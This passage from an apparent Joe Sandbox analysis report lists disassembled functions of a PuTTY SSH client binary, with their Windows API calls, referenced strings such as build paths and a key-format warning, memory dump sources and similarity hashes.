                      • Part of subcall function 00BF93A0: GetWindowRect.USER32 ref: 00BF93D0
                      • Part of subcall function 00BF93A0: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,7490B980,?,?,?,00BCD8AC,?), ref: 00BF941E
                      • Part of subcall function 00BCF6E0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCF70B
                      • Part of subcall function 00BCF6E0: GetClientRect.USER32(?,?), ref: 00BCF71D
                      • Part of subcall function 00BCF6E0: MapDialogRect.USER32(?), ref: 00BCF746
                    • ShowWindow.USER32(?,00000001), ref: 00BCF0D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Rect$LongMessageSend$ClientDesktopDialogIconLoadMoveShowText
                    • String ID: Main
                    • API String ID: 174503319-521822810
                    • Opcode ID: c973cd4955dc88ac48710c11f28127e7797f32db341e4c53b878e0c01d369387
                    • Instruction ID: 84706410676bdad9b527190bc0198ef748a5cfa474e81a4e4ddddac72443ea2d
                    • Opcode Fuzzy Hash: c973cd4955dc88ac48710c11f28127e7797f32db341e4c53b878e0c01d369387
                    • Instruction Fuzzy Hash: 64412D75600301AFEB116F20DC42F6B77EAEF85748F1404BDF589972A2EA72E914C761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BFAF00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 149COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: from $SSHCONNECTION@putty.projects.tartarus.org-2.0-$connected%s%s
                    • API String ID: 4218353326-1458757670
                    • Opcode ID: e767d6704d91fd9892e4b874f85b534174c84c34a00ce2d40092ec5c614dac2e
                    • Instruction ID: 958705b5f7f61b5d9e43be16b0a5fc8e92b4ccdf0a910f511c799be58716381b
                    • Opcode Fuzzy Hash: e767d6704d91fd9892e4b874f85b534174c84c34a00ce2d40092ec5c614dac2e
                    • Instruction Fuzzy Hash: C851C4F0A003445BE7109F65DC46B6B7BE8EF40304F144478EA5EAB352E776E908CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C131F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • file format error, xrefs: 00C131F2
                    • nlines < MAX_KEY_BLOB_LINES, xrefs: 00C13238
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/sshpubk.c, xrefs: 00C13233
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/sshpubk.c$file format error$nlines < MAX_KEY_BLOB_LINES
                    • API String ID: 4218353326-1228660610
                    • Opcode ID: 1e835be06e99efdf6597a4f86555251b9013680f291f3e215872606c70de013d
                    • Instruction ID: feef3fa7bd0fa17b79bebd3fdbcb4235aa11c8a502c5840811042a68d8cdd38c
                    • Opcode Fuzzy Hash: 1e835be06e99efdf6597a4f86555251b9013680f291f3e215872606c70de013d
                    • Instruction Fuzzy Hash: DD313DF1E042806BE710BA659C87A9B73D89B95708F050438FC56D7213E631EF58E293
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2CC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • IsDlgButtonChecked.USER32(?,?), ref: 00BD2D3B
                    Strings
                    • c && c->ctrl->type == CTRL_RADIO, xrefs: 00BD2D0C
                    • false && "no radio button was checked", xrefs: 00BD2D55
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2D07, 00BD2D50
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonChecked
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
                    • API String ID: 1719414920-168353766
                    • Opcode ID: 33889126d7c1df48fd1152947f36b27316b940479fe5124d5e3865d9d9cb4dfc
                    • Instruction ID: 1b7d9b3840f85abce98e166798e2d0c42fd5a53c836f3e363db6e7098d183699
                    • Opcode Fuzzy Hash: 33889126d7c1df48fd1152947f36b27316b940479fe5124d5e3865d9d9cb4dfc
                    • Instruction Fuzzy Hash: 0711A072B002459FD7209F58ED82F16B7D6EBA5749F0600B2F84897261E671EC448BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BFA900 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    • _strlen.LIBCMT ref: 00BFA98D
                    Strings
                    • SSHCONNECTION@putty.projects.tartarus.org-2.0-, xrefs: 00BFA97D
                    • !cs->sent_verstring, xrefs: 00BFA9D5
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/sharing.c, xrefs: 00BFA9D0
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID: !cs->sent_verstring$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/sharing.c$SSHCONNECTION@putty.projects.tartarus.org-2.0-
                    • API String ID: 1497175149-1639915603
                    • Opcode ID: 3d7680ab56e969e395ed769b6bf880a60d03b9890cffaf7c0db947b36441dda9
                    • Instruction ID: 8ab502108c4c8e4a6fa36382b1a46e84da54b1086ba99ec593452ace02f5e5e0
                    • Opcode Fuzzy Hash: 3d7680ab56e969e395ed769b6bf880a60d03b9890cffaf7c0db947b36441dda9
                    • Instruction Fuzzy Hash: FC213BB29007416BE7219A20EC42F3736D89B51318F090AB4FD09972D3E7A3E958C3B3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BDC5E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: BreakClearCloseCommHandle
                    • String ID: End of file reading from serial device$Error reading from serial device
                    • API String ID: 2685284230-2629609604
                    • Opcode ID: 640b54e963aa826e3efd4e6f45d37e384e42b17f371bc26613b4aa42fa28adf0
                    • Instruction ID: a7d22a03143a7b0326317e3e02691b16aaebfb3534b2ffdb6383c24c3eda7a2a
                    • Opcode Fuzzy Hash: 640b54e963aa826e3efd4e6f45d37e384e42b17f371bc26613b4aa42fa28adf0
                    • Instruction Fuzzy Hash: 7121CDB16007029BDB209F68DC49F07BBE8EF85315F1409A9F89AC33A1E731E814DB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB1060 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49registrywindowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Load$ClassCursorIconRegister
                    • String ID: MZx
                    • API String ID: 738324305-2575928145
                    • Opcode ID: f8b69de769db0dbdedac54b84145e86502311fb977c2494c559956fa2ce8f324
                    • Instruction ID: 5d5589740b444dbf48e4b5a38d9a2e7e727b2cefadccfa2f2715084ed4bd05c6
                    • Opcode Fuzzy Hash: f8b69de769db0dbdedac54b84145e86502311fb977c2494c559956fa2ce8f324
                    • Instruction Fuzzy Hash: 6A111570A083009FD744EF28E86976F7BE0FB48758F504E59F4899B3A0D3B59984CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48windowCOMMON
                    Download Yara Rule
                    APIs
                    • PostQuitMessage.USER32(00000000), ref: 00BB6799
                    • ShowCursor.USER32(00000001), ref: 00BB67DD
                    • MessageBoxA.USER32 ref: 00BB67FD
                    Strings
                    • Connection closed by remote host, xrefs: 00BB67F2
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$CursorPostQuitShow
                    • String ID: Connection closed by remote host
                    • API String ID: 3394085358-3682140707
                    • Opcode ID: 582043f280c2ac90a5ab1c210c3c65a5c18f37b702cf6c3d8c39b1e1bc96461a
                    • Instruction ID: cbd24d5910c55e89efae219e2ddbc48a74abf46a32b12c0547c599bf26e99910
                    • Opcode Fuzzy Hash: 582043f280c2ac90a5ab1c210c3c65a5c18f37b702cf6c3d8c39b1e1bc96461a
                    • Instruction Fuzzy Hash: 9D01F570944200AFEF202321BC0ABEC3BD5D70132EF2803A0F909A61F2DFE58C518796
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6390 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB63C9
                    • MessageBoxA.USER32 ref: 00BB63E0
                    • PostQuitMessage.USER32(00000001), ref: 00BB6416
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$CursorPostQuitShow
                    • String ID: %s Fatal Error
                    • API String ID: 3394085358-656502033
                    • Opcode ID: 0184973e92830e477205dfd3cd9b8d366165cb76fe850fb226344d9a5fe54dd1
                    • Instruction ID: ab7d6cb1631b24599ac4504d5ee621d08be18c36217a00d07a62c4cdf01ba4df
                    • Opcode Fuzzy Hash: 0184973e92830e477205dfd3cd9b8d366165cb76fe850fb226344d9a5fe54dd1
                    • Instruction Fuzzy Hash: DFF02875590340ABEB213722BC0BF9E3F94DB45719F180160F60A611F3EBE2485487E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB69A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C5DB41: IsProcessorFeaturePresent.KERNEL32(00000017,00C5149B,?,?,?,?,00000000), ref: 00C5DB5D
                    • GetDC.USER32(00000000), ref: 00BB69DE
                    • SelectPalette.GDI32(00000000,00000000), ref: 00BB69F3
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c, xrefs: 00BB69C0
                    • !wintw_hdc, xrefs: 00BB69C5
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FeaturePalettePresentProcessorSelect
                    • String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c
                    • API String ID: 1536087120-2276619470
                    • Opcode ID: 95e466116e6e5a52a0fbd72447506106a748f73e4f158cd86dd7d628bde6a051
                    • Instruction ID: 7e2adc35723b4779cfe0a611516ff8990b44422fbfc4efa23e65de47723669c1
                    • Opcode Fuzzy Hash: 95e466116e6e5a52a0fbd72447506106a748f73e4f158cd86dd7d628bde6a051
                    • Instruction Fuzzy Hash: B8F0E572A00212ABD3211BA8BC0AFEA32E9DB89B41F1D0231B942E7594CE758C418620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCEE10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • %s Key File Warning, xrefs: 00BCEE29
                    • You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 00BCEE19
                    • PuTTY, xrefs: 00BCEE18, 00BCEE28
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: %s Key File Warning$PuTTY$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
                    • API String ID: 2030045667-626526669
                    • Opcode ID: 89c884128fdd9ae593b0ce774b53ededab4b419da6a00cab49aa8fb5d0b04d52
                    • Instruction ID: af5ec24200c34e235c6e17d3bb306511fdfa42b7f583be2b302f1c721483d5cc
                    • Opcode Fuzzy Hash: 89c884128fdd9ae593b0ce774b53ededab4b419da6a00cab49aa8fb5d0b04d52
                    • Instruction Fuzzy Hash: 26E04FF39115903AE21132663C0FF6F2998CBD6B65F0900B4F80D66242FA421909C6B3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C00970 Relevance: 6.2, APIs: 4, Instructions: 168timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C00A4F
                    • __aulldiv.LIBCMT ref: 00C00A73
                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C00ACE
                    • __aulldiv.LIBCMT ref: 00C00AF1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Time$File$__aulldiv$LocalSystem
                    • String ID:
                    • API String ID: 1236384784-0
                    • Opcode ID: b81faf86312b699eb9a85f1f6321cb5ee9c952ee34c8f0db36bdd3a5e9e890ba
                    • Instruction ID: 940c5dd92ded79a47021010b5ec8de44edd19345130e679771c72a6bdd788798
                    • Opcode Fuzzy Hash: b81faf86312b699eb9a85f1f6321cb5ee9c952ee34c8f0db36bdd3a5e9e890ba
                    • Instruction Fuzzy Hash: 5E6138716043059FCB14CF28C840B9AB7E5FF89718F258A2DF99997390D771E905CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C5C788 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bfaff37bfcf1d63ae8e95d46bf247ac581743cf82fd98465f35e36bff3d38978
                    • Instruction ID: f2fa8c155f819cd995d344e0ab626bbb715f769cc9bc0647db0a71662430eee8
                    • Opcode Fuzzy Hash: bfaff37bfcf1d63ae8e95d46bf247ac581743cf82fd98465f35e36bff3d38978
                    • Instruction Fuzzy Hash: 6E411EB6A00704AFD7249F38CCC1B6ABBE9EB88711F10452AF415DB6C1D7B19984D794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB8700 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Color
                    • String ID:
                    • API String ID: 2811717613-0
                    • Opcode ID: b28e4fb8443d4cb1a1c5983325451d10bfe05512188c912ecbed057124660a7a
                    • Instruction ID: cbb175ca1f0d32520a7bfb8464b6710ca2ded69358a5a39bc233b33d2fc76e48
                    • Opcode Fuzzy Hash: b28e4fb8443d4cb1a1c5983325451d10bfe05512188c912ecbed057124660a7a
                    • Instruction Fuzzy Hash: B541956501D3D0AED301AF6880452AFBFE4AFA5600F45CD8EF4D987352D6B4C584DBA7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C68DEC Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C69A7A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C6EF79,?,00000000,-00000008), ref: 00C69B26
                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00C68E50
                    • __dosmaperr.LIBCMT ref: 00C68E57
                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C68E91
                    • __dosmaperr.LIBCMT ref: 00C68E98
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: b3f040115bc1ca3dfeca7c5213ceacd5300fafcc04768aa4bfb70776bcd53745
                    • Instruction ID: f7a2171ae5e2f79d39abcc79bebc587a27c663c0b1a08e05c5c2cc20d7bd87a6
                    • Opcode Fuzzy Hash: b3f040115bc1ca3dfeca7c5213ceacd5300fafcc04768aa4bfb70776bcd53745
                    • Instruction Fuzzy Hash: 8D21F239600605AFCB30AFA2CCC096BB7A9FF413643108619F925D7200DF32ED4997A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C7456B Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000), ref: 00C74582
                    • GetLastError.KERNEL32(?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000,00000000,?,00C6B324,?), ref: 00C7458E
                      • Part of subcall function 00C745DF: CloseHandle.KERNEL32(FFFFFFFE,00C7459E,?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000,00000000), ref: 00C745EF
                    • ___initconout.LIBCMT ref: 00C7459E
                      • Part of subcall function 00C745C0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C7455C,00C72BE2,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000), ref: 00C745D3
                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000), ref: 00C745B3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 411618e75a99dd4a3462b7a2b41e21189b464473b2b6f60c8af5806d19813af3
                    • Instruction ID: b2705a146e87c8d270326e82428d02a605423ba1a42c172593ff2421b72627ab
                    • Opcode Fuzzy Hash: 411618e75a99dd4a3462b7a2b41e21189b464473b2b6f60c8af5806d19813af3
